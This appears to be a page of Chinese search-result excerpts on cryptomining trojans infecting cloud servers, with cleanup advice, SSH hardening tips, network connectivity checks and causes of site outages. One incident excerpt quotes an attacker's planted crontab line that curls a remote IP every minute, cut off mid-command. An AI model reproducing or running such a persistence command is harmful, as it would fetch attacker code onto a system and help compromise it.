一般情况下，挖矿病毒都是自动扫描+自动挂马生成的，并不会是有专人进行攻击，所以也比较好清除，注意清除之后需要 check 有无后门。 最重要几点（也可能是被hack的原因）：禁止 ROOT 用户登陆，ROOT 不能使用弱密码，FRP 需要配置，不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

什么是挖矿木马 挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源，一般都会对全网进行无差别扫描，同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点，在主机被成功入侵之后，挖矿木马还会向内网渗透 ...

一、什么是挖矿木马 挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源，一般都会对全网进行无差别扫描，同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点，在主机被成功入侵之后，挖矿木马还会向内 ...

1. 先测试网络能否ping通: ping 远程 IP 2. 如果网络能ping通表示网络连接正常，然后就要测试端口： telnet 远程IP 端口 3. 如果telnet不上，要考虑一下服务器是否有防火墙拦截： Centos7是查看防火墙是否运行 ...

云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因，导致一些云服务器ECS中了挖矿病毒的坑。 总结了一些解决挖矿病毒的一些思路。由于病毒更新速度快仅供参考。 1、查看cpu爆满的进程 cpu占用率 100%, 用top 查看cpu100 2、杀死进程 ...

线上服务器用的是某讯云的，欢快的完美运行着Tomcat，MySQL，MongoDB，ActiveMQ等程序。突然一则噩耗从前线传来：网站不能访问了。 此项目是我负责，我以150+的手速立即打开了服务器，看到Tomcat挂了，然后顺其自然的重启，启动过程中直接被killed，再试试数据库，同样 ...

最近emr集群跑任务的时候总出现 task failed ，优化sql，调提交任务参数都没解决，最后再我排查时候，发现一个从节点的cpu使用800% 经过一些列排查，发现是被注入木马了， #被人种下的crontab#* * * * * curl -s http://158.69.133.17 ...

网站崩溃的原因 1.访问量过高，超出系统承载能力 2.这个访问量，不仅包括正常访问，也有异常访问的，包括攻击在内。（黑客攻击，黑客领用软件请求服务器所有端口，但是不释放端口，就导致其他用户进不了这个网站。） 3.服务器配置过低，低于预期网站发展的设想，虽然是超负载，但是因为配置太低 ...